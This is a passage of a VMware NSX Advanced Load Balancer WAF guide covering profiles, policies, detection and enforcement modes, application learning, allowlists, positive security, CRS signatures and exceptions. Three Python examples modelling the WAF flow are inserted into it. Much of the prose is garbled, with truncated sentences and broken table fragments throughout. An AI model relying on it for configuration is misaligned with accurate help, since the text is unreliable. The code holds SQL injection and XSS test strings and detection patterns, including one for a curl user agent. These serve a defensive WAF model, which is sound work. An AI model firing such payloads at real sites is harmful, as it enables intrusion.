It describes "how does an attack look like", which can be formulated as "how the request should not look like".

What is Allowlisting?
The component "Allowlist" decides whether a request should be checked by the WAF or not. For example, the customers may prefer to bypass WAF for all POST requests to /upload.php.

What is Learning?
In a system, Learning is a method of collecting statistical information about an application's normal usage in order to generate a "Positive Security Model".

What is the WAF processing flow?
The WAF processing flow is as follows:
1 First, for an incoming request, the Allowlist policies are checked. If any condition matches, the request is whitelisted, i.e., WAF processing is turned off for that request.
2 If none of the conditions match, the positive security engine checks whether the request is in line with the learnt data.
3 If a request is marked as illegitimate by the positive security engine, it is flagged/blocked immediately.
4 If Positive Security marks the request as legitimate, the request is sent to the Signature engine, which verifies by matching parts of the request against a valid signature in order to identify the attack vector.
5 If WAF finds an attack vector, it blocks the request. If not, the request is passed.
6 If WAF is in Enforcement mode, it blocks the requests.
7 If WAF is in Detection mode, it flags the requests but does not block them.

What is a False Positive?
Sometimes a legitimate request is flagged as an attack. This may affect the business and also create fear among customers.

What is a False Negative?
When an attack is not detected, it is called a False Negative. This affects security but not the business (in the perception of the user). However, the site continues to work.

What is an exclusion for false positive mitigation?
An exclusion adds a matching condition of
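The seven-step processing flow in the FAQ above, modelled as an added Python example; this is not code from the guide or from the VMware product. The status names PASSED and REJECTED, the rule identifiers, the allowlist rules (conditions within one rule are ANDed), the learnt parameter pattern, the two signature patterns and the sample requests are all constructed assumptions.

```python
"""Constructed model of the NSX ALB WAF processing flow: Allowlist -> Positive Security -> Signatures -> mode."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network


@dataclass
class Request:
    """Minimal HTTP request view (assumption: not the product's data model)."""
    client_ip: str
    method: str
    path: str
    args: dict = field(default_factory=dict)  # query/body parameters


@dataclass
class AllowlistRule:
    """Bypass WAF when every configured match condition holds (conditions are ANDed)."""
    methods: tuple = ()              # empty tuple = any method
    path_prefix: str | None = None   # e.g. "/upload.php" or "/admin"
    client_net: str | None = None    # e.g. "10.0.0.0/8"

    def matches(self, req: Request) -> bool:
        if self.methods and req.method not in self.methods:
            return False
        if self.path_prefix and not req.path.startswith(self.path_prefix):
            return False
        if self.client_net and ip_address(req.client_ip) not in ip_network(self.client_net):
            return False
        return True


@dataclass
class WafPolicy:
    mode: str                  # "DETECTION" or "ENFORCEMENT"
    allowlist: list            # list of AllowlistRule
    learnt_params: dict        # positive security model: path -> {param name: regex}
    signatures: list           # negative security: (rule id, compiled regex)


def _disposition(policy: WafPolicy, hits: list[str]) -> tuple[str, list[str]]:
    # Steps 6/7: Enforcement blocks; Detection only flags and lets the request through.
    return ("REJECTED" if policy.mode == "ENFORCEMENT" else "FLAGGED"), hits


def evaluate(policy: WafPolicy, req: Request) -> tuple[str, list[str]]:
    """Return (WAF status, list of matched elements) for one request."""
    # Step 1: Allowlist first; a match switches WAF processing off for this request.
    if any(rule.matches(req) for rule in policy.allowlist):
        return "BYPASSED", []
    # Steps 2/3: Positive security; compare each parameter against the learnt model.
    model = policy.learnt_params.get(req.path)
    if model is not None:
        for name, value in req.args.items():
            pattern = model.get(name)
            if pattern is None or re.fullmatch(pattern, value) is None:
                return _disposition(policy, [f"PSM:ARGS:{name}"])
    # Steps 4/5: Signature engine; match request parts against attack signatures.
    hits = [f"{rule_id}:ARGS:{name}"
            for rule_id, regex in policy.signatures
            for name, value in req.args.items()
            if regex.search(value)]
    if hits:
        return _disposition(policy, hits)
    return "PASSED", []


def demo_policy(mode: str = "ENFORCEMENT") -> WafPolicy:
    """Constructed sample policy mirroring the examples in the FAQ."""
    return WafPolicy(
        mode=mode,
        allowlist=[
            AllowlistRule(methods=("POST",), path_prefix="/upload.php"),   # FAQ example
            AllowlistRule(path_prefix="/admin", client_net="10.0.0.0/8"),  # constructed
        ],
        # Learnt positive security model: product_id must be 1 to 63 digits (constructed).
        learnt_params={"/product.php": {"product_id": r"[0-9]{1,63}"}},
        # Two constructed signatures standing in for the CRS signature set.
        signatures=[
            ("SIG-SQLI", re.compile(r"(?i)'\s*or\s+1\s*=\s*1")),
            ("SIG-XSS", re.compile(r"(?i)<\s*script")),
        ],
    )


if __name__ == "__main__":
    policy = demo_policy()
    for req in (Request("203.0.113.5", "POST", "/upload.php", {"file": "<script>"}),
                Request("203.0.113.5", "GET", "/product.php", {"product_id": "42 or 1=1"}),
                Request("203.0.113.5", "GET", "/search.php", {"q": "<script>alert(1)</script>"})):
        print(req.method, req.path, "->", evaluate(policy, req))
```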
VMware NSX Advanced Load Balancer WAF Guide
VMware NSX Advanced Load Balancer 20.1.5
3401 Hillview Ave.
Palo Alto, CA 94304
www.vmware.com
Copyright 2021 VMware, Inc. All rights reserved. Copyright and trademark information.
Contents
1 Overview 5
2 Configuring WAF 7
WAF Profile 7
Configuring WAF Profile 8
WAF Policy 12
Configuring WAF Policy 12
WAF Mode 15
Application Learning for WAF 16
Allowlist 21
Configuring Allowlist Rules 21
Sampling Traffic to WAF Allowlist 27
Partial Buffering for Chunked Mode Encoding 28
Support for IP Groups in Allowlist 28
Positive Security and Learning 31
Configuring Positive Security Group 31
Deploying WAF Signatures 43
Signatures CRS rules 46
Pre-CRS Rules 48
Post-CRS Rules 54
Mixed Mode and Enabling Mode Delegation 54
3 Best Practices for working with WAF 57
Creating Exclusions 57
Exclusions in WAF 57
Creating Exceptions 58
Examples for Creating Exclusions 58
Importing the CRS files and CRS Update from NSX Advanced Load Balancer Portal 59
Download the CRS File 59
Upload the CRS File 61
Custom Rules 62
Custom Rules Examples 62
Vulnerability Scanner (DAST) 67
Workflow 67
Limitations DAST scanner integration 68
WAF in Anomaly Score Mode 68
Anomaly Scoring 69
Setting Up WAF in Anomaly Scoring mode 70
4 Analytics and Insights 73
WAF Log Analytics 73
Analyzing WAF Logs Analytics 74
WAF Analytics 76
WAF Metrics 79
Preview Exceptions 80
Preview Logs 81
5 FAQ's 83
1 Overview
This section explains the NSX Advanced Load Balancer Web Application Firewall
Web application firewalls (WAFs) are intended to protect businesses from web app attacks and proactively prevent threats.
Traditional web application security solutions do not provide visibility and security insights that administrators can use to create an effective application security posture. Enterprises need real-time visibility into application traffic, user experience, security and threat landscape, and application performance to identify and protect against the most sophisticated attacks.
NSX Advanced Load Balancer leverages software-defined architecture and its strategic location on the network to gain real-time application insights. The built-in WAF solution provides application security and networking teams with an elastic and analytics-driven solution that scales and simplifies policy customization and administration through central management.
NSX Advanced Load Balancer WAF plays an integral role in a defense-in-depth strategy that does comprehensive threat analysis, mitigates risk, provides zero-day protection against unpublished exploits and optimizes application security.
NSX Advanced Load Balancer WAF is built on core design principles that ensure WAF is a simple yet comprehensive security solution.
Configuring WAF
2
This section discusses Web Application Firewall (WAF) configuration on NSX Advanced Load
BalancerThis chapter includes the following topics:
n Positive Security and Learning
n Deploying WAF Signatures
n Mixed Mode and Enabling Mode Delegation
This section explains the WAF Profile feature on NSX Advanced Load Balancer.
The WAF profile is independent of the policy and is defined for a specific set of virtual services, so it can be reused wherever that is feasible. A few examples of WAF profiles are given below:
n API Profile: This profile contains API-specific settings.
Configuring WAF Profile
This section discusses configuring the WAF Profile.
n Navigate to Templates > WAF > WAF Profile to locate the default profile.
settings served through a virtual service.
the default profile (System-WAF-Profile).
To create a new profile, follow the below:
1 Navigate to Templates > WAF > WAF Profile.
2 Click on the Create icon.
Provide the following details to configure the WAF profile:
Field Description Additional Information
Name Enter a relevant name for the profile.
the profile. entries.
the profile. Different applications might need different methods.
The default HTTP methods are GET, HEAD, POST, OPTIONS. APIs might use other HTTP methods such as PUT, DELETE, TRACE, CONNECT etc. You can also choose from the additional options provided below:
n PATCH
n PROPFIND
n PROPPATCH
n MKCOL
n COPY
n MOVE
n LOCK
n UNLOCK
types for the profile. content types.
restricted and blocked. reside on a web server.
Restricted Headers Enter headers that will not be allowed by WAF.
Field Description Additional Information
that will bypass the WAF check. parameter or dynamic part is
classified as a static request. It does
not contain any attack vector.
Response Header, and Response Body are the four WAF phases. Each of these phases has a default action. The fields defined for this default action are phase, action, status code, additional logging, WAF logs.
phase: The description for each phase is given below:
phase:1 - Request Header phase
phase:2 - Request Body phase
phase:3 - Response Header phase
phase:4 - Response Body phase
Example- phase:1
action: Two options are permit and deny. Example- deny
status code: In case the request is denied by WAF then, by default a 403 status code is sent to the client. However, the status code can be customised (if required). Example- status:403
additional logging: Enter the additional logging level. Example- log
WAF logs: Enter the WAF logging level. Example- auditlog
To configure the General Settings, follow the below:
are selected.
are selected.
default, standard content types are covered.
Note The other content types can be added easily.
blocking. By default, it covers most use-cases.
most use-cases.
Extensions.
Maximum client request size This is the maximum size for the client request body scanned by WAF. Example - 32
KB allowed by WAF.
Argument Separator Enter the separator for special applications that have different argument separators. Example - &
each regular expression match when
the processing rules.
WAF processing for a single request.
version. deprecated. Therefore, Netscape cookies are recommended.
to External Entities.
The following screenshot displays a sample configuration:
The static input data in a WAF profile that is shared between virtual services is stored here. For
instance, the file name sql-errors.data has the default data set which contains strings for
examining HTTP responses for data leakage protection.
To create a new file, follow the below:
1 Go to the File Tab.
3 Provide a Name and enter the relevant Data.
Rules
This section discusses the WAF Policy on NSX Advanced Load Balancer.
associating it with a virtual service.
Configuring WAF Policy
This section discusses how to configure the WAF policy.
n Navigate to Templates > WAF > WAF Policy to locate the default policy.
OWASP CRS rules. For more information, refer to Signatures CRS rules.
the default policy (System-WAF-Policy).
To create a new policy, do the following:
1 Navigate to Templates > WAF > WAF Policy.
created WAF Policy.
3 Configure the new WAF policy under the following tabs:
4 Click on Save button to create the WAF policy.
Provide the following details to configure the WAF policy:
Field Description Additional Information
Name Enter a relevant name for the policy.
be attached to this policy. The profile contains common reusable settings that complement the WAF policy.
Mode Click on the required mode. The supported modes are:
n Detection — In this mode, WAF policy will evaluate the incoming request. A log entry of type (WAF type) FLAG is created when the request is FLAGGED.
n Enforcement — In this mode, WAF policy will evaluate and block the request based on the defined default action. This default action is configured in the WAF profile. If any action is rejected, there will be a corresponding log entry named as REJECTED.
n Mode delegation — In this mode, WAF rules can overwrite the policy, where a specific action (detection or enforcement) can be defined for a single rule, irrespective of the action defined for the rule set.
It is recommended to use detection only mode when onboarding a new Application. For more details, refer to WAF Mode. For more information on Mode delegation, refer to Mixed Mode and Enabling Mode Delegation.
policy. This is used to determine the rigidity of the policy and has a direct impact on the potential false positive rate.
The below screenshot displays a sample configuration:
The following section discusses the differences between these two modes.
Advanced Load Balancer. Every policy runs in one of these modes to evaluate the requests and responses.
Detection Only | Enforcement
deny action is taken. | matched and deny action is taken.
stopping at the first rule hit. | request and implements the default action or returns a rule specific error code.
the policy violation was found and entries for every rule that is matched. | which has the first rule that rejected the request. Note This is to improve performance. If a request is already detected as an attack, further checks are not required.
Response Code 200 OK | Default is 403 Forbidden. This response code can be modified.
Application Learning for WAF
This section discusses Application Learning for WAF.
analyze a set of incoming traffic processed by the WAF Policy.
and sends it to the Controller for Analysis. Therefore, all Learning takes place on the Controller.
The traffic selection for Application Learning is based on the WAF policy configured.
continues during a specified duration or time interval. Once the timer is hit, the Service Engine
sends the data to the NSX Advanced Load Balancer Controller for analysis. These WAF
configuration parameters are distributed across WAF policies.
To enable the Learning option, follow the below:
n Navigate to Template > WAF > WAF Policy.
n Select the policy for which App Learning should be enabled.
The below screenshot exhibits the option to enable App Learning:
additional configuration options will be available to edit as below:
Field Description Additional Information
Sampling Percent of the requests subjected to Application learning. Range (1 to 100%).
rule updates on the WAF Profile. Rules will be programmed in a dedicated WAF learning group.
Auto Promote Rules w/ Confidence Minimum confidence label required for auto rule updates. Low / Probable / High / Very High (99.99 -100%)
Application learning data to
controller.
for an application.
Field Description Additional Information
required for a Param to qualify for learning.
Max URI Maximum number of URI paths to learn for an application. This value can be set higher for more complex applications. Range (10 -10000).
combinations when they reach the confidence score. If DISABLED the learning algorithm will program params independently from the URI. This can be useful when URIs are generated for each session.
Adaptive Application Learning
This section explains Adaptive Application Learning.
supported. In Adaptive Application Learning, the Controller takes control of adjusting these WAF
Learning parameters for the effective Application Learning while the SE just enforces it.
learning interval is not required.
learning progress, a feedback system is created that tunes these parameters once learning is
enabled on an application. Using Positive Security Model (PSM) with Application learning enables
the end-user to automate the configuration changes.
by the Controller:
For a WAF policy, sampling is assigning a percentage of the incoming requests to participate in
the Application Learning process.
happens in the Controller.
incoming requests or every alternate request.
Learning. This helps in collecting the fastest data aggregation, and efficient application learning.
When learning is in progress, the URI information is sent to NSX Advanced Load Balancer
Controller tend to peak or fall.
the SEs. After the sampling, the SEs have to inspect or evaluate only a small percentage of the
incoming traffic. The maximum sampling percent for the application learning is set to 100%, the
minimum percentage can be set as 1%.
the analytics profile.
By default, the value of the enable_adaptive_config parameter is set to true.
Advanced Load Balancer Controller changes the sampling rate for the learning.
1 Navigate to Template > WAF > WAF Policy.
2 Click on the Learning tab as shown below.
Note It is recommended to use the automated adjustment of the sampling rate.
This section discusses the Learning Interval.
to Application Learning to the NSX Advanced Load Balancer Controller. By default, this duration is set to 30 minutes. This means that the Service Engines send data to the NSX Advanced Load Balancer Controller every half an hour for further processing. Based on the learning activities or the amount of Application Learning data, the value of this parameter can be increased or decreased.
The Allowlist functionality allows the definition of match conditions for requests that will perform
associated actions.
Bypassing WAF when there is a match:
n The request comes from a specific IP range.
n Allow access from the internal network.
n Run parts of the application in Detection mode.
Configuring Allowlist Rules
This section discusses how to configure Allowlist Rules.
To define Allowlist rules, do the following:
2 Click on Create Or Edit an existing WAF Policy.
3 Enter the required details under the Settings tab.
4 Click on the Allowlist tab.
5 Click on the Add Rule button.
Table 2-1. General
Rule Enabled By default, the Allowlist rule is enabled. Click on the toggle button to disable it, if required.
Name Enter a relevant name for the rule.
Description Enter a description to define the rule.
Table 2-2. Match
Add Match Type Select a Match Type from the options:
n Client IP
n HTTP Method
n Path
n Host Header
Table 2-3. Action
Action From the following options, select the action to be performed when the request matches the criteria specified:
n Bypass: When Bypass is selected, WAF does not execute any further rules and the request is allowed.
n Continue: Selecting Continue stops the allowlist execution and directs WAF to continue its activity.
n Detection Mode: When set, the WAF Engine will be set to Detection Mode for that request.
The New Allowlist Rule screen is as shown below:
This section discusses the Match Type.
Use this match type to select a trusted list of client IPs or client IP groups.
To configure a match rule for the client IPs:
1 Select the match type as Client IP under Add Match Type.
2 Select Is or Is Not to provide permissions accordingly.
3 Click on the drop down under Method.
article.
Use this to select only specific types of HTTP requests using the HTTP request methods like GET,
CONNECT, DELETE, and more.
To define allowlisting rules based on HTTP Method, follow the below:
2 Select Is or Is Not to provide permissions accordingly.
3 Select the Methods as shown below:
To allowlist URLs, follow the below:
1 Select the match type as Path under Add Match Type.
2 Select the Criteria which needs to be matched in the URL.
3 Enter the String Value in String group or custom string.
4 Select Match Case to enable case sensitivity.
Use this method to apply rules to only requests that match the specified host header criterion.
To allowlist Host Headers, do the below:
2 Select the Criteria which needs to be matched in the URL.
3 Enter the String Value.
Sampling Traffic to WAF Allowlist
This section discusses Sampling Traffic to WAF Allowlist.
particular percentage of traffic for WAF allowlisting. It is beneficial only if we want to send a
subset of all traffic through WAF. The sampling_rate flag is used to allot a range for each allowlist
rule. The sampling_rate value can range from 0 to 100%.
example if sampling is set to 50 %, then every other request will trigger the action.
Example 1
Consider the following configuration:
n Match client IP address: 1.2.3.4
WAF), the other 90% of them will continue to the next allowlist rule.
to WAF, the rules can be written like this:
n Sampling percentage: 100
n Sampling percentage: 100
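The allowlist evaluation described above (the match types, the Bypass / Continue / Detection Mode actions, and per-rule sampling) as an added Python example; this is not code from the guide or from NSX Advanced Load Balancer, and the Request shape, the rule names and the deterministic sampling counter are assumptions made for the example.

```python
import ipaddress
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

Predicate = Callable[["Request"], bool]


@dataclass
class Request:                      # constructed request shape for this example
    client_ip: str
    method: str
    path: str
    host: str


@dataclass
class AllowlistRule:
    name: str
    matches: List[Predicate]        # every configured match type must hold
    action: str                     # "BYPASS", "CONTINUE" or "DETECTION_MODE"
    sampling_rate: int = 100        # percent of matching requests that trigger the action
    enabled: bool = True


# Match types from Table 2-2; negate=True models the "Is Not" choice.
def client_ip(cidrs: List[str], negate: bool = False) -> Predicate:
    nets = [ipaddress.ip_network(c, strict=False) for c in cidrs]
    return lambda r: any(ipaddress.ip_address(r.client_ip) in n for n in nets) != negate


def http_method(methods: List[str], negate: bool = False) -> Predicate:
    wanted = {m.upper() for m in methods}
    return lambda r: (r.method.upper() in wanted) != negate


def path_begins_with(prefixes: List[str], match_case: bool = False) -> Predicate:
    def pred(r: Request) -> bool:
        p = r.path if match_case else r.path.lower()
        return any(p.startswith(x if match_case else x.lower()) for x in prefixes)
    return pred


def host_header(hosts: List[str]) -> Predicate:
    wanted = {h.lower() for h in hosts}
    return lambda r: r.host.lower() in wanted


class Allowlist:
    """Evaluates rules top-down; the first rule that matches and is sampled decides."""

    def __init__(self, rules: List[AllowlistRule], policy_mode: str = "ENFORCEMENT"):
        if policy_mode not in ("DETECTION", "ENFORCEMENT"):
            raise ValueError(policy_mode)
        self.rules, self.policy_mode = rules, policy_mode
        self._acc = {r.name: 0 for r in rules}   # one sampling accumulator per rule

    def _sampled(self, rule: AllowlistRule) -> bool:
        # Deterministic stand-in for the Service Engine's sampling: at 50% every other
        # matching request triggers, at 10% every tenth; the rest fall through to the next rule.
        self._acc[rule.name] += rule.sampling_rate
        if self._acc[rule.name] >= 100:
            self._acc[rule.name] -= 100
            return True
        return False

    def evaluate(self, req: Request) -> Tuple[str, Optional[str]]:
        """Returns (disposition, waf_mode): "BYPASS" means no WAF rule runs at all,
        "INSPECT" means the WAF engine runs in the returned mode."""
        for rule in self.rules:
            if not rule.enabled or not all(m(req) for m in rule.matches):
                continue
            if not self._sampled(rule):
                continue                                # not sampled: next allowlist rule
            if rule.action == "BYPASS":
                return "BYPASS", None                   # request allowed, no further rules
            if rule.action == "DETECTION_MODE":
                return "INSPECT", "DETECTION"           # WAF only flags for this request
            if rule.action == "CONTINUE":
                return "INSPECT", self.policy_mode      # allowlist stops, WAF continues normally
            raise ValueError(f"unknown action {rule.action}")
        return "INSPECT", self.policy_mode              # no rule matched: policy mode applies


# Constructed rule set: the internal network bypasses WAF, a canary path is inspected in
# detection mode for half of its traffic, and a partner IP explicitly continues into WAF.
RULES = [
    AllowlistRule("internal-bypass", [client_ip(["10.0.0.0/8"])], "BYPASS"),
    AllowlistRule("canary-detect", [path_begins_with(["/beta/"]), http_method(["GET", "POST"])],
                  "DETECTION_MODE", sampling_rate=50),
    AllowlistRule("partner-continue", [client_ip(["1.2.3.4/32"]), host_header(["app.example.test"])],
                  "CONTINUE"),
]


def run_sample() -> List[Tuple[str, Optional[str]]]:
    """Runs a constructed request sequence through the allowlist and returns the dispositions."""
    al = Allowlist(RULES, policy_mode="ENFORCEMENT")
    reqs = [
        Request("10.20.30.40", "GET", "/admin", "app.example.test"),        # internal: BYPASS
        Request("203.0.113.9", "GET", "/beta/search", "app.example.test"),  # 1st canary hit: not sampled
        Request("203.0.113.9", "GET", "/beta/search", "app.example.test"),  # 2nd canary hit: DETECTION
        Request("1.2.3.4", "DELETE", "/api/item/1", "app.example.test"),    # partner: CONTINUE
        Request("198.51.100.7", "POST", "/login", "app.example.test"),      # nothing matched
    ]
    return [al.evaluate(r) for r in reqs]
```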
Partial Buffering for Chunked Mode Encoding
This section discusses Partial Buffering for Chunked Mode Encoding.
with chunked-encoding was supported.
is supported. The remaining payload is streamed while maintaining the original chunk boundaries sent from the client.
Support for IP Groups in Allowlist
This section discusses Support for IP Groups in Allowlist.
were supported while configuring allowlist. Starting with NSX Advanced Load Balancer release 20.1.3, configuration using IP groups is also supported for allowlist.
Configuring Using NSX Advanced Load Balancer
This section explains how to configure an IP group and use it in a WAF allowlist for making all requests from IPs in the IP group called Trusted IPs bypass WAF checks.
a Provide the required name.
creating a new allowlist rule.
bypass for any client IP address which is part of the IP address group created in the previous step.
Positive Security and Learning
This section discusses Positive Security and Learning feature for WAF.
Learning Engine, scanner import or manually. A Positive Security rule will match when the request
(or parts of the request) matches the behaviour defined in the rules. This is in contrast to
Signatures, which describe attack patterns and will match when an attack pattern is found.
n Mode (Detection / Enforcement) by rule
n Paranoia levels of rules
Reasons for Using the Positive Security Model
n As Positive Security is defining application behaviour it can reduce the attack surface by only
allowing known good traffic.
a long list of known attacks, the validation is against a single expression.
Configuring Positive Security Group
This section discusses how to configure a Positive Security Group.
To create a Positive Security group, follow the below steps:
2 Click on Create or Edit an existing WAF Policy.
3 Enter the required details under the Settings tab.
4 Click on the Positive Security tab.
option available next to Add Positive Security group.
Field Description Additional Information
Name Enter a relevant name for the policy.
Description Enter a description to identify the group.
Learning Group Select this option to enable the group for learning.
No operation from the drop down. match_value pattern, this action will be executed. Allowed actions are WAF_ACTION_NO_OP and WAF_ACTION_ALLOW_PARAMETER.
from the drop down. match the match_value pattern, this action will be executed. Allowed actions are WAF_ACTION_NO_OP and WAF_ACTION_BLOCK.
Location Click on Add Location to create a new location. Rules are created in locations. Locations are derived from URLs.
This section discusses Creating a Location.
Enter details in the New Location screen as shown below:
1 Enter a unique Name to identify the location.
2 Enter the Description.
3 Select a Match Type, for example: Path.
5 Enter the String Value in String group or custom string.
6 Select Match Case to enable case sensitivity.
Creating an Argument Rule
This section discusses Creating an Argument Rule.
In the New Argument Rule screen, do the following:
default. The Rule Enabled option is enabled by default.
2 Enter a unique Rule ID.
3 Enter the rule Name.
4 Enter a Description for the rule.
used. For the policy mode to take effect, the WAF policy should allow delegation.
Any rule configured to intercept HTTP transactions will be bypassed.
the rules configured.
Paranoia level to the rule is optional. It is recommended to leave the paranoia level value at 1.
7 Define the Match Elements as shown below:
value. To know more about Match Value Pattern refer to String Groups Support.
same case as specified in the match value pattern.
a In the field Name, select the variable specification.
b Enter a Sub Element.
Name and Sub Element. The New Argument Rule screen is as below:
Selecting a Paranoia Mode
This section discusses Selecting a Paranoia Mode.
The available paranoia modes are:
n 1- Low (Default and recommended mode)
n Risk level of an application.
n Resources available for policy tuning.
High application risk level High paranoia mode
Low application risk level Low paranoia mode
Resources available for tuning Higher paranoia mode
Limited resources available for tuning Lower paranoia mode
String Groups Support
Starting with NSX Advanced Load Balancer release 20.1.3, string groups are supported in
addition to the match value pattern as mentioned in the previous section. The string group
consists of the following:
n Key – PCRE-supported regular expression.
Argument rule is as shown below:
create a new string group.
and click on the Add Map option as shown below:
100. A string group supports a maximum of 1000 key values.
Deploying WAF Signatures
WAF signatures are one of the security services delivered through Pulse. The WAF signature service is opt-in and is disabled by default.
vulnerabilities as identified by Open Web Application Security Project (OWASP), such as SQL
Injection (SQLi) and Cross-site Scripting (XSS), while providing the ability to customize the
rule set for each application.
management process.
portal. For more information refer to Pulse and WAF Core Rule Set.
it.
Automated WAF Signatures Update
You can check the Auto Download WAF Signatures option in the Opt-In settings window to deploy signatures automatically. The Controller must be registered to Avi Pulse before the opt-in options can be selected to enable this feature. For more information, refer to Pulse.
Pulse Opt-in page.
Manual WAF Signatures Update
You can check the WAF Signatures Notifications option in the Opt-In settings window to receive a notification when new Signatures are available.
Controller will not deploy the latest data automatically on it; instead, an event with a download link to download the data file will be generated.
n Navigate to Templates > WAF > CRS.
n Click on the Upload File button to upload WAF signature files.
Signatures CRS rules
In this section the NSX supplied OWASP CRS policy can be configured. It covers the OWASP Top
Ten attack protection.
update the CRS ruleset without any risk in production. However, these new rules must be moved
into Enforcement mode (or inherited policy mode) manually.
applied to the rules.
To update CRS Rules, do the following:
2 Click on the required CRS Version to select it.
version.
Post and Pre-CRS Rules
The final step in WAF processing is a signature check. Core Rule Sets (CRS) can be configured
under the Signatures tab. You can configure to execute custom rules before CRS or after CRS as
well. For more information refer to the below section.
This article shows how to configure Pre-CRS rules.
Pre-CRS rules. For more information, refer to Custom Rule Examples.
To define Pre-CRS rules, do the following:
2 Click on Create Or Edit an existing WAF Policy.
3 Enter the required details under the Settings tab.
4 Click on the Signatures tab.
5 Under Pre-CRS rules, click on Create Group.
6 Enter the Group Name. Every rule is configured within a group.
7 Click on the Create Rule button.
8 Enter a Name for the rule.
used. For the policy mode to take effect, the WAF Policy should allow delegation.
Any rule configured to intercept HTTP transactions will be bypassed.
the rules configured.
10 Enter the Rule in the text box.
12 Click on the toggle button to enable the rule.
Exceptions are a common way of tuning a WAF policy to work with an application.
The following are a few other reasons for creating exceptions:
n For false-positive mitigation.
n For applications that do not conform to the System-WAF-Policy.
HTML content in query parameters.
accessing application on its direct IP address.
you can even add them manually.
To define an exception manually,
Exceptions.
Subnet- 10.0.0.0/8, Path- /admin, Match Element - REQUEST_BODY.
exception.
Note Exceptions can be created on a group level or a rule level.
The rule configured with exceptions is as shown below:
IP and Path will just have ARGS:xyz removed while processing the rule.
Recommended Assisted Workflow
The following steps are for a recommended workflow to configure exceptions:
1 Use WAF Analytics to find possible false positives.
Add Exception.
a The modal dialog will generate a set of suggested values.
3 Save the exception to apply it to the policy.
The custom rules that are applied after the supplied OWASP Core Rule Set (CRS) are configured under Post-CRS rules.
To configure post-CRS rules, do the following:
2 Create Groups and Rules as discussed in the Pre-CRS Rules section.
Mixed Mode and Enabling Mode Delegation
WAF Policy can be configured to operate in either detection only or in enforcement mode.
operate in any of the following three modes:
application log message and the request is allowed through.
Balancer Service Engine, and an application log message is generated.
defined for a single rule, irrespective of the action defined for the rule set. This is also referred to
as the mixed mode, and allows fine tuning to avoid legitimate requests from being blocked, due
to enforcement mode.
The following section discusses a few use cases relevant for enabling Mode Delegation:
mixed mode enabled to avoid false positives. You will be able to introduce new rules to
operate in detection mode, so that legitimate requests are not rejected.
the policy in detection mode. With this you will not need to entirely enforce WAF implementation in detection mode.
Enabling Mode Delegation
1 In NSX ALB UI, navigate to Templates > WAF > WAF Policy.
2 Click on Create or Edit an existing WAF Policy.
enable mixed mode.
Enabling Policy Mode for a Rule
To enable policy mode for a certain rule, follow the below steps:
1 Navigate to the Signatures tab and select the CRS version.
2 Under RULE MODE, select the option as Use policy mode.
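The Detection, Enforcement and mode-delegation behaviour described in this section and in the Detection Only / Enforcement comparison, together with an exception that removes ARGS:img from a rule for a subnet and path, as an added Python example; this is not the guide's or the product's code, and the rule ids, the regex stand-ins for signatures and the Request shape are assumptions made for the example.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Request:                      # constructed request shape for this example
    client_ip: str
    path: str
    args: Dict[str, str]            # parameters, inspected as ARGS:<name>


@dataclass
class Exclusion:
    """Exception as on this page: for a client subnet and path, one match element
    (e.g. ARGS:img) is removed from the rule's targets while the rule is processed."""
    subnet: Optional[str]
    path_prefix: Optional[str]
    match_element: str


@dataclass
class Rule:
    rule_id: int                    # constructed ids in the custom-rule range, not CRS ids
    pattern: str                    # regex over each parameter value, standing in for a signature
    paranoia_level: int = 1
    mode: str = "USE_POLICY_MODE"   # per-rule mode: USE_POLICY_MODE, DETECTION or ENFORCEMENT
    exclusions: List[Exclusion] = field(default_factory=list)
    enabled: bool = True


@dataclass
class Policy:
    mode: str                       # "DETECTION" or "ENFORCEMENT"
    paranoia_level: int
    allow_mode_delegation: bool     # the policy's mixed-mode switch
    rules: List[Rule]
    deny_status: int = 403          # default-action status code from the WAF profile


def effective_mode(policy: Policy, rule: Rule) -> str:
    """A rule's own mode overrides the policy mode only when delegation is allowed."""
    if policy.allow_mode_delegation and rule.mode != "USE_POLICY_MODE":
        return rule.mode
    return policy.mode


def _targets(rule: Rule, req: Request) -> Dict[str, str]:
    ip = ipaddress.ip_address(req.client_ip)
    excluded = set()
    for ex in rule.exclusions:
        if ex.subnet and ip not in ipaddress.ip_network(ex.subnet, strict=False):
            continue
        if ex.path_prefix and not req.path.startswith(ex.path_prefix):
            continue
        excluded.add(ex.match_element)
    return {f"ARGS:{k}": v for k, v in req.args.items() if f"ARGS:{k}" not in excluded}


Log = List[Tuple[str, int, str]]


def evaluate(policy: Policy, req: Request) -> Tuple[int, Log]:
    """Returns (status, log). Detection logs FLAGGED for every matching rule and answers 200;
    Enforcement stops at the first rejecting rule and answers the profile's deny status."""
    logs: Log = []
    for rule in policy.rules:
        if not rule.enabled or rule.paranoia_level > policy.paranoia_level:
            continue                                # rule sits above the policy's paranoia level
        rx = re.compile(rule.pattern, re.IGNORECASE)
        for target, value in _targets(rule, req).items():
            if not rx.search(value):
                continue
            if effective_mode(policy, rule) == "ENFORCEMENT":
                logs.append(("REJECTED", rule.rule_id, target))
                return policy.deny_status, logs     # no further checks once rejected
            logs.append(("FLAGGED", rule.rule_id, target))
            break                                   # one FLAGGED entry per rule
    return 200, logs


# Constructed rule set; 4000204 is a "new" rule kept in detection mode through delegation.
RULES = [
    Rule(4000204, r"curl/", mode="DETECTION"),
    Rule(4000201, r"<\s*(script|img)\b", exclusions=[Exclusion("10.0.0.0/8", "/admin", "ARGS:img")]),
    Rule(4000202, r"union\s+select"),
    Rule(4000203, r"[\x00-\x1f]", paranoia_level=2),
]


def run_scenarios() -> Dict[str, Tuple[int, Log]]:
    """The same constructed requests under detection, enforcement, an exception, delegation, PL2."""
    img = {"img": "<img src='/images/foo.png'>"}
    pub, internal = "203.0.113.9", "10.1.2.3"
    return {
        "detect": evaluate(Policy("DETECTION", 1, False, RULES), Request(pub, "/foo", img)),
        "enforce": evaluate(Policy("ENFORCEMENT", 1, False, RULES), Request(pub, "/foo", img)),
        "excepted": evaluate(Policy("ENFORCEMENT", 1, False, RULES), Request(internal, "/admin/up", img)),
        "delegated": evaluate(Policy("ENFORCEMENT", 1, True, RULES),
                              Request(pub, "/s", {"q": "x union select y", "ua": "curl/8"})),
        "pl1": evaluate(Policy("ENFORCEMENT", 1, False, RULES), Request(pub, "/s", {"q": "a\x01b"})),
        "pl2": evaluate(Policy("ENFORCEMENT", 2, False, RULES), Request(pub, "/s", {"q": "a\x01b"})),
    }
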